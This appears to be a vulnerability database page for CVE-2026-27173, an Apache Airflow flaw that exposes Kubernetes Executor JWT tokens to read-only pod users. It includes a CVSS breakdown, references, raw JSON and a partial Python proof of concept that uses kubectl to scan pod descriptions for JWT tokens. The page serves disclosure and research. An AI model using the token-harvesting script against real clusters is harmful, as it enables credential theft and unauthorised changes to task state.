Security Vulnerability Report
CVE-2026-27173 CVSS 8.7 HIGH

CVE-2026-27173

Published: 2026-05-19 20:16:17
Last Modified: 2026-05-19 21:16:42

Description

JWT tokens used by workers in Kubernetes Executors were exposed to users who had read-only access to Kubernetes Pods. This could allow users with only read-only access to perform actions that were meant to be available only to running tasks via the Task SDK, and potentially to modify the state of tasks in the Airflow database.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available.

Apache Airflow (see the official advisory for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
PoC for CVE-2026-27173: Apache Airflow JWT Token Exposure

This script demonstrates how a user with read-only access to K8s pods
might extract sensitive JWT tokens.
"""
import re
import subprocess


def get_pods_in_namespace(namespace):
    # List all pods in the target namespace (requires read access).
    # Arguments are passed as a list (no shell) so namespace cannot be
    # interpreted by a shell.
    cmd = ["kubectl", "get", "pods", "-n", namespace, "-o", "json"]
    result = subprocess.run(cmd, capture_output=True, text=True)
    return result.stdout


def inspect_pod_for_jwt(namespace, pod_name):
    # Describe the pod to check environment variables and mounts
    cmd = ["kubectl", "describe", "pod", pod_name, "-n", namespace]
    result = subprocess.run(cmd, capture_output=True, text=True)
    output = result.stdout

    # Simple regex to look for JWT patterns (header.payload[.signature]);
    # the hyphen is placed last in each class so it is literal, not a range.
    jwt_pattern = r"ey[A-Za-z0-9_=-]+\.[A-Za-z0-9_=-]+\.?[A-Za-z0-9_.+/=-]*"
    tokens = re.findall(jwt_pattern, output)

    if tokens:
        print(f"[+] Found potential JWT in pod {pod_name}:")
        for token in tokens:
            print(f"Token: {token[:50]}...")
    else:
        print(f"[-] No JWT found in description of {pod_name}")


if __name__ == "__main__":
    target_namespace = "airflow"
    print(f"[*] Scanning namespace: {target_namespace}")
    print("[!] Attempting to list pods (requires kubectl configured and read permissions)")
    # In a real scenario, parse JSON output to get pod names
    # and loop through them calling inspect_pod_for_jwt
    print("[!] If pods are accessible, check 'env' and 'volumes' sections for tokens.")
```

References

- https://github.com/apache/airflow/pull/60108
- https://lists.apache.org/thread/pk3m2z4s2rkmc0v6gh9hnch9spc6stqw
- http://www.openwall.com/lists/oss-security/2026/05/19/35

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-27173", "sourceIdentifier": "[email protected]", "published": "2026-05-19T20:16:17.440", "lastModified": "2026-05-19T21:16:41.920", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "JWT tokens that were used by workers in Kubernetes Executors have been exposed to users who had read only access to Kuberentes Pods. This could allow users with just read-only access to perform actions that were only available to running tasks via Task SDK and potentially allow to modify state of Airflow Database for tasks."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-538"}]}], "references": [{"url": "https://github.com/apache/airflow/pull/60108", "source": "[email protected]"}, {"url": "https://lists.apache.org/thread/pk3m2z4s2rkmc0v6gh9hnch9spc6stqw", "source": "[email protected]"}, {"url": "http://www.openwall.com/lists/oss-security/2026/05/19/35", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
```